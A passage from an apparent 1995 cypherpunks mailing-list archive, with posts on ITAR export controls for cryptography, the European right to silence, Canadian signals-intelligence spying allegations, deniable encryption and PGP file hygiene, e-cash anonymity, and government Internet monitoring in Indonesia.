    drove him out of cleveland to NJ with their anti-trust actions in 
    1890 (or thereabouts) and the U.S. under Teddy "Rough Rider" Roosevelt
    broke him apart nationally in 1909 for his slash and burn tactics.
    Where is Teddy when we need him for Microsoft, not the awestruck 
    Bubba we have as commander and chief.

    I should remember more about John D. and anti-trust than I do, but it 
    is over 30 years since I wrote my senior thesis at Harvard on
    regulation of monopoly. --and age is setting in! :) Yes, I know you
    are retired --hopefully happily with a pension. consultants with blood
    on their hatchets make few friends, and the terms of getting old are
    more like time involutarily on your hands in So CA's empty economy.
    the hell you say, it's more like one big study and learn time! 
    Knowledge was and still is power!  as long as we have cryptography to 
    protect it.

	Dr. Daniel Flickinger
	 
> --Tim May
> 





From froomkin at law.miami.edu  Fri Nov 17 14:01:58 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 18 Nov 1995 06:01:58 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <199511171958.OAA30121@tinman.dev.prodigy.com>
Message-ID: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>


sorry, but there is a right to remain silent in Europe:

[quoting from footnote 360 (whatsamatter you didn't get that far?) of my
Clipper paper:] 

The European court of Human Rights recently ruled that the
right to right to remain silent is guaranteed under the European
Convention on Human Rights (formerly known as the Convention for the
Protection of Human Rights and Fundamental Freedoms), Nov. 4, 1950, art.
6(1), 213 U.N.T.S. 221. See Funke v. France, 256 Eur. Ct. H.R. (ser. A) at
8 (1993) (holding that Article 6(1) of the European Convention on Human
Rights guarantees the right against self-incrimination); Ying H. Tan, Use
of DTI Interviews Unfair, INDEPENDENT (London), Sept. 30, 1994, at 30
(reporting the decision of the European Commission of Human Rights in
Saunders v. United Kingdom). 



On Fri, 17 Nov 1995, Michael Smith wrote:
0
> >
> >>Forgive me if this point has already been raised, but couldn't an 
> >>objection to such laws be based on the protection against 
> >>self-incrimination? 
> >
> >There is no such right in most (if not all) european countries. In
> >France there is not even the presumption of innocence.
> 
> [Further depressing news deleted]
> 
> Yes, this was my understanding. I guess the point I was groping 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.







From anonymous-remailer at shell.portal.com  Sat Nov 18 06:07:15 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 95 06:07:15 PST
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511181405.GAA10722@jobe.shell.portal.com>


On Fri, 17 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> > Hmm, actually the news tape is reading a little strange here in Canada.
> > Not AP, or REUTERS, but simply the Canadian Press newswire.

     [snip]

> Taking three successive news stories from three days ... (press stories,
> I've since pulled for my own reference) and pasting them together to
> indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

I still feel such a sense of violation with what LD did, such an utter
sense of helplessness at the character assassination I've suffered at his
hands, that I feel that I must take some token action to "set the
record straight".  Something which clears my name.

Here is the TRUE unedited story for the list which Deitweiler felt he
had to TWIST to the nth degree.  His attempt at making mountains out
of mole hills will not succeed with this one.

I won't have him attack me, and attack everything I'm trying to
achieve on this list, through his games.  It's a non-starter from the
get go, LD.

Here's what was truly written ... let the list decide for itself.



COMMUNICATIONS SECURITY ESTABLISHMENT
Canada spied on allies: ex-agent

Top secret security agency accused of eavesdropping
on South Koreans by former analyst

The Canadian Press 
TORONTO

  Canada's electronic espionage agency has spied on friendly countries
such as South Korea, Mexico and Japan despite Ottawa's denials, a
former agent has told CTV News.
  "I have lived with this information for so long and I just think
that it is time that Canada knows what CSE is doing, " Jane Shorten
said in a report for broadcast late Sunday.
  Shorten, 38, worked as an analyst from 1986 to 1994 -- when she was
laid off -- for the Communications Security Establishment (CSE), CTV
reports.
  A separate entity from the better known Canadian Security
Intelligence Service, CSE can be described as a technological peeping
tom.  It specializes in electronic espionage, monitoring radio and
other transmissions for useful information.
  The Soviets and their allies were once the prime targets of such
surveillance, but after the thaw in the Cold War, CSE shifted its
attention to friendly countries, Shorten told CTV.
  The agency spied on Canada's allies and trading partners,
eavesdropping on friendly embassies, consulates, diplomats in Canada
and around the world, she said.
  Ottawa denies it.  "Countries like Canada have understandings that
they don't carry out these activities against each other, " Solicitor
General Herb Gray said earlier this year in response to claims that
the U.S. Central Intelligence Agency had spied on the Japanese
delegation during auto trade talks in Geneva.
  Replies Shorten: "He does not know what's going on because CSE is
certainly doing that ... I spied on the (South) Korean government for
the Canadian government."
  CSE is part of the Defence Department but Shorten insists senior
officials at the Foreign Affairs Department were fully aware of its
activities and anxious for its information.
  "I know my reports went to the Ministry of Foreign Affairs," Shorten
told CTV. "My reports were classified as Top Secret Umbra and that's
as high as you can get, and these people were cleared to get that kind
of information."
  Shorten, once described by a superior as a gifted intelligence
analyst, told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but felt the risk of prison
was worth it.
  "I feel so strongly that it's time that people learned what CSE is
all about," she said.








From jimbell at pacifier.com  Fri Nov 17 14:46:12 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 06:46:12 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tGGn7-0008x9C@pacifier.com>


>On Thu, 16 Nov 1995, Scott Brickner wrote:
>> 
>> You'd need a program which not only *accepted* the additional parameter,
>> but also *needed* the second parameter.  I confess I have some difficulty
>> thinking of one.
>
>It's not too hard to think of a compression scheme that needs extra 
>information to be passed from client to server; the obvious example is 
>some sort of dictionary compression with external dictionaries (can be 
>very effective for short messages where LZW etc never get a chance to get 
>going). 
>
>Another, more likely case, is where the object could have been compressed 
>by several schemes, and a scheme ID is needed to determine which 
>alogorithm to use. 
>
>The real issue would appear to be intent, though. If it's obvious that 
>the real intention for the hook is to allow encryption to be added, 
>the State department can jump on it. 

I'm not a programmer, but it seems to me that if the goal is to minimize the
"obviousness" of the provision for cryptography, the calling program could
call the called program (which might be an encryption program, maybe not)
and ask for a text header that is to be listed in a Windows-type window.
Thus, the calling program would not have any references to "encryption" or
"key" in its program or documentation; it would get that the first time it
calls the called program.  

BTW, one function which obviously  needs an additional argument to work is a
CRC program, in which the particular polynomial to be used must be
specified.  And I guess that a CRC is basically the same type of thing as a
hash function, too.






From futplex at pseudonym.com  Fri Nov 17 14:47:46 1995
From: futplex at pseudonym.com (Futplex)
Date: Sat, 18 Nov 1995 06:47:46 +0800
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To: <m0tGVUJ-0008xnC@pacifier.com>
Message-ID: <199511172156.QAA15802@opine.cs.umass.edu>


jim bell writes: [re: payee anonymity]
> It seems to me that this should be possible, within limits, if the potential
> payee could generate a "blinded" note to be delivered to the payer by
> anonymous means.  The payer could get the note certified by the bank,
> possibly given an extra "blind" if necessary  (is this possible? Desirable?
> Why not?) and then the resulting still-blinded but certified note is posted
> (in encrypted form, I supposed) to the 'net so that only the payee can
> decrypt and unblind it.

This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
dollar bill first." As I understand your protocol, Bob gives Alice an enote,
then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
since Bob ends up with the same amount of e$ with which he started. Perhaps
you could clarify what you meant.

-Futplex <futplex at pseudonym.com>
"I'm not touched, but I'm aching to be...."





From froomkin at law.miami.edu  Fri Nov 17 14:47:49 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 18 Nov 1995 06:47:49 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951110003648.3551H-100000@viper.law.miami.edu>


[sorry for the delay, things are busy here, and apologies too for the 
length of this thing...]

Misunderstanding, piled on misunderstanding, piled on disagreement.
I'll try to focus on the big points, and let the small stuff slide.
Let the record show that Prof. Junger and I still agree on lots of stuff 
that's outside this debate.  I wasn't trying to attack him before, and 
I'm not trying to start a flamewar now.

Main point for the busy:  Claims that the US government could apply the 
ITAR to 2 foreigners abroad and get a US court to buy it are, IMHO, 
unfounded.

On Thu, 9 Nov 1995, Peter D. Junger wrote:
[...]
> seem to have two different areas of disagreement:  (i) whether the
> ITAR's provisions relating to cryptographic software apply to foreign
> persons who disclose (or transmit) cryptographic software to another
> foreign person without the United States

[....the Itar is unconstitutional....]
Yes.
> 
> Now Mr. Froomkin says:
> 
>   In short, in this particular case the ACEA, and by extention the
>   ITAR, doesn't "say what it says" it "says what it must mean".
> 
> (And I dare him to make that assertion in the faculty lounge at Miami
> when some of the more critical and analytically inclined members of
> the Miami law faculty are present.)  I would take this as an admission

I would say it anywhere.  Some days I would even claim to be one of those 
people..,

> that the ACEA and the ITAR does say what it says (even if it must mean
> something else) were it not for the fact that--and this was my ``ultra
> vires'' point--that the ACEA doesn't say it.
> 
> (In discussing the quoted passage I am assuming that ``extention''
> must mean ``extension'' and that it is not used as the opposite of
> ``intention'', if only because I don't know what the latter would be.
> But on the other hand the only dictionaries I have to hand are the COD
> and the on-line version of Webster's Collegiate.)
> 
> The AECA doesn't contain any definition of ``export'' whatsoever; the
> whole issue that we are discussing turns on the interpretation of what
> the ITAR says when it defines ``export'' as including:
> 
>   Disclosing (including oral or visual disclosure) or transferring
>   technical data to a foreign person, whether in the United States or
>   abroad ....
> 
> Now Mr. Froomkin seems to be contending that this language must be
> interpreted as it would be interpreted by some sort of neo-Platonic
> court (probably sitting in Rawl's original position by designation),
> which he calls ``any court''.  The contention is:

Nope.  Never said it, didn't mean it.  I mean a good ol' garden variety 
US federal court.

>   any court construing the ACEA would inevitably read the prohibition
>   on "exporting" to a foreign person as not applying where the nation
>   lacks jurisdiction.  
> 
> Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
> vires'' argument--that any court reading the ACEA would notice (i)

Here's a misunderstanding (for which I'm happy to take full 
responsibility).  What I meant by the "ultra vires" point is this:
There are lots of ways in which an agency action can be struck down by 
the courts.  Two of them are:

1) The agency interpreted the statute correctly, but the statute was 
unconstitutional -- beyond Congress's powers under the constitution.

2) The agency interpreted the statute Incorrectly, and tried to do 
something beyond the powers delegated to it by congress (the nice thing 
about this is that one doesn't even reach the issue of whether Congress 
could, in theory, have delegated the power in question).

> that there is no language in that act defining ``export'' and (ii)
> that ``export'' does not mean disclosing, or even transferring,
> information (which is what cryptographic software is) and (iii) that,
> in consequence, the Office of Defense Trade Controls exceeded its
> congressionally granted authority, and therefore its constitutional
> authority, when it came up with the perverse provision that is at
> issue here.  But that is the subject of my other, as yet unwritten,
> message.

That's what I meant by my ultra vires assertion.  Type (2) above.  So we 
agree in a sense as to what this problem is -- but I call this a case of 
an agency misconstruing the statute, not a "separation of powers" problem.

Let's assume, for the argument, that I'm wrong and that the agency read 
the statute reasonably (note under Chevron it doesn't have to read it 
"right" just reasonably).  

Does the agency read the statute to apply to two foreigners talking on 
the beach at Calais?  No it does not.   

Did Congress intend the statute to be applied to the two foreigners?  No
evidence that it did. 

Would or should a court read the statute to apply to two foreigners etc.
in the absence of a clear direction from Congress to that effect? No. 

Why not?  Two main reasons.  One is the one you identify:
> Now I take it that Mr. Froomkin's contention turns on the claim that
> Congress lacks jurisdiction under international law to pass a
> statute--or authorize a regulation--that makes it a crime for a
> foreign person to transmit something to another person when both of
> them are outside the United States.  So as to avoid the other

The other one is that even if Congress had the jurisdiction, the court 
would be reluctant to read the statute that way, with the implications 
for foreign relations, comity, etc etc without clear directions to do 
so.  And if you think the court would just formalistically follow the 
words of the statute, see eg Church of the Holy Trinity, 143 US 457 and 
its progeny.

> constitutional and ultra vires and so on issues, let us assume that
> Congress were to amend the ACEA to make it a crime ``to transfer a
> cryptographic device to a foreign person within the United States or
> abroad without first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''
> 
> And now assume that someone, F, who is a foreign person and who has
> never been in the United States transfers a cryptographic device that
> was not made in the United States or by a United States company to
> another foreign person who person who has never been in the United
> States.  And now assume that F does come to the United States on a
> holiday and that he is arrested and indicted for violating the AECA in
> that he did transfer a cryptographic device to a foreign person.
> 
> The first thing to notice is that the indictment is not defective.
> The only defense--since it is the only one that we are interested in
> and we control the hypothetical--is: ``but that was in a foreign
> country'' and therefore the United States has no jurisdiction under
> international law (or under something) to treat F's actions as a
> crime.
> 
> So the defense moves to dismiss the indict on those grounds.  And the
> prosecution stipulates that the acts charged occured in a foreign
> country, that F is a foreign person, etc.
> 
> On those facts I would hope that the court would construe the statute
> as not covering F's actions outside the United States and would dismiss
> the indictment, but--considering that the statute specifically says it
> applies both within the United States and ``abroad''--I am not nearly
> as sanguine as Mr. Froomkin is.  But let us assume that the indictment
> is dismissed.

I cannot imagine that the court would do anything but dismiss on these 
facts. 

> 
> And now the hypothetical provision in the ACEA is again amended by
> congress to make it a crime ``for (i) a United States citizen to
> transfer a cryptographic device to a foreign person within the United
> States or abroad or (ii) a foreign person to transfer a cryptographic
> device to a foreign person within the United States or abroad, without
> in either case first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''

Note that now we are more explicit that in the ACEA.
> 
> And now assume that F', who has never been in the United States
> transfers a cryptographic device to a foreign person and thereafter
> comes to the United States and is arrested indicted for violating the
> hypothetical provision of the ACEA.  It would seem to me that there is
> no way that any but the most willfully wrong-headed court (and there
> are, I admit, such courts) would construe the hypothetical provision
> as not covering F's actions, since it does so clearly cover those
> actions.  I mean that there is no way that the court can get away with
> concluding that it does not mean what it says.
> 
> So what can F' do now?  Well, he could try to raise the claim that the
> lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
> ``any court'' construing the ITAR's actual provisions would not apply
> to F or F'--is a ground for dismissing the indictment.
> 
> But how can he raise that point?  He can't very well deny that the
> court has jurisdiction over his person--he's sitting in the court with
> shackels on--and he can't get away with claiming that the court
> doesn't have jurisdiction to try him for violating the ACEA.
> 
> So it would seem that F's only hope would be to move to dismiss the
> indictment on the ground that to continue the prosecution would be to
> deny him due process because the United States lacks jurisdiction
> under international law.

There are a number of other arguments he could make.  E.g. denial of due 
process for lack of notice.  Unconstitutionality of the statute as 
exceeding the powers of congress as a violation of international law.  A 
weaker argument would be an analogy to the ex post facto clause -- now 
the government seeks to apply its laws to him after the fact.  I do not 
think that the Neuremburg precedent would be contrary, since the claim of 
the US there was that some laws of man and nations are always in force 
everywhere.  Restrictions on crypto exports does not fall in that class.

> 
> Now I am no expert in this area, but I would be surprised if the
> courts would recognize this as costitutional defense.  As I understand
> it from talking with somebody here at CWRU who is knowledgeable, the
> courts of the United States tend to defer in such cases to Congress

A vast and unhelpful oversimplification.  what do you mean by "such 
cases"?  Criminal prosecutions of US citizens for messing in foreign 
policy is one thing; criminal prosecutions of foreigners for acts that 
have foreseeable effects here is another thing; criminal prosecutions on 
the facts above is a whole different thing.

> and the executive--when they are in agreement, as they would be in our
> hypothetical--and principles of international law count for little.

It is certainly true that as Justice Jackson put it, the powers of those 
branches are greatest when they agree.  But the constitution trumps all.  

> 
> So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
> the crime of delivering a cryptographic device to a foreign person
> outside of the United States.

I do not agree.  See above.

> 
> Now lets get back to the ITAR as it is actually written.  In an actual
> criminal action brought against a foreign person who is accused of
> disclosing cryptographic information to a foreigner outside the United
> States--not that I think such an action will ever actually be
> brought--the government can point out to the court the facts that I
> have just discussed, so the court will be aware that there is no
> constitutional provision requiring the dismissal the indictment, even
> if the indictment is contrary to international law.  And a real court,
> as opposed to Mr. Froomkin's ``any court'' might in those
> circumstances feel free to determine that the ITAR means what it says.
> (That's just common sense.)

But no.  First there is the constitutional arguments.  Then there is the 
idea that we interpret the statute to avoid the constitutional and 
international problems.  Then there is the problem that there are no 
grounds to think that Congress ever intended to reach foreigners in such 
cases (and Holy Trinity Church, 143 US 457 (1892) still gets cited 
(despite its anachronistic view of religion)).

> 
> And, were the government ever to bring such a case it, it would argue,
> and I think that it would convince a lot of real judges, that the
> criminal action does not violate international law because the United
> States is protecting its own economic interests by prosecuting foreign
> persons who disclose cryptographic information to other foreign
> persons outside the United States.  The government's lawyer will
> argue:
> 
>   Judge, the United States is in a real bind.  It is absolutely
>   necessary for our national security that we forbid the export of
>   cryptographic software.  But, on the other hand, as those
>   Cryptopunks keep pointing out, we are distroying our computer
>   industry by enforcing the ITAR against American companies.  So the
>   only solution is to apply the ITAR against foreigners as well so
>   that the American computer industry will have a levelled--I mean a
>   level--field to play upon.  And the anti-trust cases make it
>   absolutely clear that the United States does have jurisdiction to
>   enforce its laws against foreign  criminal who break those laws
>   outside of the United States when their crimes have a negative
>   effect upon the economy of the United States.
> 
> I am afraid that most federal district court judges would buy that
> argument, and I am not even sure that Mr. Froomkin's ``any court''
> wouldn't buy it. 
> 
I think many district judges, most appellate judges, and almost every 
supreme court justice would at least reject, if not laugh at, that 
argument.  The trend is away from assertions of jurisdiction over 
foreigners without minimum contacts, e.g. Asahi (sp?).

> And, in any case, if such a criminal case were to be brought, the
> government would almost certainly be able to allege additional facts
> to help justify the claim that the US does have jurisdiction over the
> matter under international law.

I'm sorry, but everything that follows the line above is irrelevant.  If
there are other grounds to prosecute, the court will use those and avoid
the constitutional problem.  If the foreigner isn't really foreign, then
he's not a foreigner.  I'm going to respond in detail anyway because I
think that the FUD factor may be coming in to play... 

> 
> For example, the defendant might be French, and the French government
> might be cheering the United States government on.  If the crime is a
> crime under both French law and the law of the United States then
> there is going to be no problem with the United States asserting
> jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
> murder example.)

I don't see what dual criminality has to do with this.  Am I supposed to 
be on notice that if I do an illegal thing here to my neighbor, I'm 
supposed to be at risk of prosecution in Sri Lanka?  Anyway, recall that 
in the original hypo foreigner A is talking *legally* to foreigner B.  
Even if they are not, it's not within the competence of the US 
government to do anything about it.  Nor -- I have to say this over and 
over and over and over -- has the US government ever asserted in any form 
that it would seek to do anything about this.  Just because an 
over-literal reading of a regulation could lead to that view does not 
equal an actual assertion of jurisdiction by the government.

> 
> Or the defendant may have studied cryptography in the United States,
> before he returned home and disclosed the information.
>
Not relevant.  Note, by the way, that on these facts the "export" was by 
the (us person?) who taught the foreigner crypto in the US, not later.
 
> Or the information that he disclosed had previously been unlawfully
> exported from the United States in violation of the ITAR (PGP, for
> example).

Not relevant.  

> 
> Or the foreign person is an employee of a United States company or a
> foreign company doing business in the United States.
> 
Not a foreigner, or the export is traced to a non-foreigner who then is 
the one charged with the ITAR violation.

> Or even that the disclosure was done by a message transmitted over the
> Internet that happened to be routed through the United States.

So what? The people are still outside the US.

> 
> But the matter is even more simple than that since the government is
> not going to bring those criminal charges against a foreign person or
> a United States person or anyone else if they can possibly avoid it.
> The ITAR's provisions on cryptographic software are used by the
> government to spread fear, uncertainty, and doubt, and to discourage
> the spread of strong cryptography.  Since an actual criminal case
> would almost certainly result in at least significant parts of those
> provisions being held unconstitutional, the government is not going to
> bring such a case if it can find any other ways of satisfying its
> goal.
> 
> And looked at that way, our foreign person who discloses cryptographic
> software to one or more other foreign persons abroad is going to be
> the perfect fall guy.  As I have suggested before, the government will
> simply bar him from getting a visa to enter the United States since
> violation of United States foreign trade regulations is a ground for
> denying a visa--at least an immigrants visa.  And, despite Mr.
> Froomkin's claim that our foreign person would have a cause of action
> if his ``petition'' were denied, he would probably have no recourse
> whatsoever.  Certainly he would have no claim that the United States
> has no jurisdiction to exclude him for acts done by him outside the
> United States; the United States has jurisdiction to exclude
> foreigners for things that the foreigners did outside the United
> States, like believing in polygamy.  And a foreign person outside the
> United States may not have standing to complain of violations of his
> freedom of speech outside the United States in an American court.
> 

I invite you to consider the recent decision of the 9th circuit that 
foreigners in the US have full 1st Am. rights.  Of course, the position 
of the would-be enterant is not the same as the position of even the 
temporary visitor to our shores, since constitutional rights don't attach 
to foreigners until they are in the country, but the language of that 
case is very suggestive.


> But let us assume, contra-factually that Mr. Froomkin is right, and
> that the poor, excluded foreign person would have a good cause of
> action to force the government to give him a visa.  (Though I really
> am curious as to what that action would be.)  That cause of action is
> going to cost tens of thousands of dollars to pursue, and it will take
> years before it is resolved in favour of our foreign person, who will
> be excluded--or sitting in jail with a bunch of Cuban and Chinese
> refugees--until the case is resolved in his failure.

Yes, litigation is expensive.  The foreign person unjustly excluded on 
this hypo will spend the time at home, writing crypto for profit, and 
reducing our tax base.  Meanwhile academic lawyers such as us will be 
representing her free of charge.  The government is sometimes unjust; 
even when you win against it you are worse off often than if you hadn't 
had to fight.  That's a wholly different issue from whether you win in 
court, which is what I thought we were arguing about.

> 
> I am sorry to have written such a long message, and to have been so
> slow in writing it, but I think that part of the problem is that both
> Mr. Froomkin and I were shooting from the hip, and that is why our
> disagreement grew.
> 
> But perhaps it has all been worthwhile, for I do think that there are
> a few useful conclusions that can be drawn from this discussion:
> 
>   (i) We academic lawyers tend to try to settle real world questions
>   as if they were academic questions;

Speak for yourself please.

I do not accept this accusation.  I assert that my "solution" to the
"problem" of whether a court would allow a criminal prosecution of a
foreigner, however "evil", for discussing crypto with another foreigner in
a foreign locale absent the most explicit and direct instructions from
Congress is the correct one: probability near zero.  Direct, clear
instructions from Congress supported by a legislative history or
legislative findings that made it clear that this was a result Congress
intended would raise the probability considerably, but I'd still bet on
the court striking the statute down as violating due process.

The academy is part of the real world.  All so-called real world questions
are fit subjects for academic study.  Much of my work is inspired by
concrete problems, or is (I hope) applicable to them.  Some of my work is
more abstract.  They applications are less immediate.  I'm proud of that
too. 

> 
>   (ii) It is never safe to assume that any court will construe a
>   statute or a regulation as meaning something other than what it
>   says; 

It at least as dangerous to believe that a court will formalistically 
apply text as if statutory construction, especially in the shadow of the 
constitution, were a mechanistic process.

> 
>   (iii) One can only construe a legal text in a particular context;
>   even if one thinks that one can figure out how any court would
>   interpret the text in qustion, one still nees to know how the text
>   got before the court; and

This is a fair point.  The facts *do* matter.  This is why "hard cases 
make bad law."  

> 
>   (iv) The fact that you can always sue the police for unconstitutional
>   harassment isn't of much help when they reach for the rubber hose.

But the fact that you can do so is part of the reason why rubber hoses are 
less common than they would otherwise be.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.







From viking at pacifier.com  Fri Nov 17 14:56:57 1995
From: viking at pacifier.com (Robert East)
Date: Sat, 18 Nov 1995 06:56:57 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <m0tGYiZ-0008zoC@pacifier.com>


>>MS> However, if I have a wall safe and
>>MS> they get a warrant to search it, can I be jailed for contempt if I
>>MS> don't give them the combination?
>>
>>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>>obstruction of justice.  Especially if they cut it open and find that
>>the knife was in the safe.
>
>So presumably the same would apply to the password that unlocks my 
>PGP private key. But there's an interesting twist. Once they open 
>up the wall safe, they can see for sure what is and isn't in it. This 
>ain't necessarily so for an encrypted file. Suppose my software has the 
>fiendish sophistication to disgorge different keys depending on what 
>password was given, and different pieces of cleartext depending 
>on what key was used. (Again, I apologize if this notion has already 
>been extensively discussed.) Is there a way to set it up such that 
>the cops couldn't be sure -- even using a logic analyzer -- that I 
>hadn't given them the complete set of keys, so as to read all the 
>cleartexts in the file? Assume that cyphertext files are guaranteed 
>to be larger, by some random factor, than the sum of all the cleartexts 
>in them, so the mere fact that a smaller quantity of cleartext was 
>disgorged than cyphertext supplied would tell them nothing. I guess this 
>is a kind of steganography, isn't it? Or at least something similar -- 
>the point would be that they couldn't tell genuine cyphertext from 
>camouflaging noise, without the key that tells them where to look. 
>
>Which brings us, in turn, to the bottom line: the only things we 
>can be certain the bad guys _won't_ do, are the things they _can't_
>do. 
> 
>
>--Michael Smith

The interesting thing about PGP is that any incriminating cypher text one
might have on his or her hard disk would, most likely, be in someone else's
public key.  So, even if they had your secret key the only thing that could
be uncovered would be cyphertext that someone else had written to you.
Granted, that this could be incriminating but, then again, not necessarily.
I'm sure that for the purposes of conducting a criminal investigation, your
own cyphertext would be far more incriminating than someone else's. (The
above is only true unless you use the single key encryption option offered
for personal files in which case your files would be readable.) 

What one should be more concerned with is sloppy handling of plain text files
used prior to encryption.  A good example of that is if you're using Windows
based applications such as MS Winword.  It has an auto-store function that
generates a "Temp" file.  Such files aren't wiped in the same fashion that PGP
uses when it wipes a text file prior to encryption.

I think that the paramount thing to consider is if you have something to
hide then it is best to store it is inside your head.  Any computer based
storage system is bound to have certain limitations that may be bridged by a
determined government agency.  The other alternative is to ensure that
potentially incriminating files be purged regularly to avoid such potential
problems.

Robert East
viking at pacifier.com






From jcobb at ahcbsd1.ovnet.com  Fri Nov 17 15:37:15 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Sat, 18 Nov 1995 07:37:15 +0800
Subject: No Privacy Right in UK ?
In-Reply-To: <199511172025.PAA13462@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>


   
 
Perry, 
 
 
Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
is closely related to cryptography in at least three ways. 
 
 
                           (1) 
 
Cryptography is a means to accomplish an end: privacy. That's 
why the epigraph 
 
         Cypherpunks assume privacy is a good thing
             and wish there were more of it 
 
heads up the post, "No Privacy Right in UK ?" 
 
 
                           (2) 
 
Farther, the case discussed in the post was a prosaic example 
of invasion of privacy by deception.  That the case is ordinary, 
and therefore liable to be lost sight of, makes it all the more 
significant that the largest London daily publicized it; and did 
so in a sympathetic manner.  That helps us here in the United 
States to propagate the importance of the right to privacy.  Cy- 
pherpunks --poetic defenders of privacy (see the epigraph)-- can 
reciprocate the favor by bringing it to people's attention. 
   
Cryptography is not the only means of reversing deceptive inva- 
sions of privacy.  But it is peculiarly suitable for reversing 
some such invasions because it uses deception to ensure, rather 
than invade, privacy.  Thus it can provide a model for the so- 
called prosaic cases: the sting.  For the sting also is designed 
to deceive deceivers, criminal or otherwise.  Privacy is, in part, 
protection from victimization. 
 
 
                           (3) 
 
Further, Clinton attended an elite university in the UK.  Can you 
imagine what notions he may have found attractive there?  Notions 
that can be "encoded" to make them attractive to us here in the 
States; then, if we buy into them, can be "decoded" and...applied! 
 
 
Cordially, 
 
Jim 
 
 
 
INCLOSURE: 
 
On Fri, 17 Nov 1995, Perry E. Metzger wrote:

 
 Could you please explain what this has to do with cryptography?
 
 "James M. Cobb" writes:
  
  11 16 95 The Electronic Telegraph runs a newsstory headed 
  
    Doorstep polish researcher was whiplash injuries spy 
  





From jya at pipeline.com  Fri Nov 17 15:39:08 1995
From: jya at pipeline.com (John Young)
Date: Sat, 18 Nov 1995 07:39:08 +0800
Subject: Corrections about Bob Noyce and Intel
Message-ID: <199511172211.RAA12522@pipe3.nyc.pipeline.com>


Worth magazine of Dec/Jan has a lubricious article on "The 
Super Investors of Silicon Valley":


" 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
and paychecks are oversized, so is their impact on the economy 
and culture. It's not for nothing that California's venture 
capitalists think they're at the center of the universe."


It traces some of the mauling by rapacious VC tigers of unwary 
techno-bambis and gleefully vaunts winner-take-all when the 
chips are down (multiple puns there) -- commensurate with the 
flatulent flattering flummoxing of this "financial 
intelligence" oilslicker.


For more FFF FinInt organ-grinding the monkeys, see 
"Downloading Warren Buffet's Brain."








From hallam at w3.org  Fri Nov 17 15:42:01 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 18 Nov 1995 07:42:01 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>
Message-ID: <9511172249.AA09569@zorch.w3.org>



>sorry, but there is a right to remain silent in Europe:

Pity the British Tories do not understand that. Because they brought in
the stupid "right of the prosecution to bring attention to the 
defendants refussal to answer questions" it probably means that a
very large number of current prosecutions will get sent down in about
three years time. Guess the cost of that!

It was only done because they had nothing else to spout at their conference.
My father (who is a conservative and whose cousin was chairman of the party
until recently) said he felt sick when he saw the conference on TV. Three 
strikes and you are out type stuff... 

Actually there is a set of crimes relating to fraud where there is a 
specific crime of refusal to answer interrogation. They messed this one
up as well. Rather than phrase it that the trustees of a fund have a duty to
account for the whereabouts of the funds at all times when asked they
simply removed the right to silence. Since trustees take on a position
voluntarily I don't see the same problems in requiring them to perform
certain duties (which involve disclosure) as removing their right to 
silence.


I don't think that the right to remain silent would be read in the manner
asserted however. It is a question of refusal to provide materal evidence
rather than a refusal to testify.


	Phill





From jcobb at ahcbsd1.ovnet.com  Fri Nov 17 15:51:24 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Sat, 18 Nov 1995 07:51:24 +0800
Subject: No Privacy Right in Indonesia ?
Message-ID: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 

 
Friend, 
 
 
An 11 17 95 Reuter Information Service newsstory headlined 
 
     Politics, not sex, is Indonesian Internet's concern 
 
reports that 
 
   In Indonesia, the quiet Internet revolution has not gone un- 
   noticed by the armed forces. 
 
Here are more excerpts from the newsstory: 
 
   Armed forces spokesman Brigadier-General Surwarno Adi- 
   wijoyo told Reuters the military had suggested to the com- 
   munications ministry the need for some sort of "toll gate" 
   to "black out" news which could damage culture or affect 
   security. 
 
   It has also suggested registering uses and users, he said. 
 
   ...nobody doubts the military is watching. 
 
   Activists in Indonesia who use the Internet say it is a power- 
   ful tool for distributing information in a society where self- 
   censorship abounds, newspapers are tightly controlled, jour- 
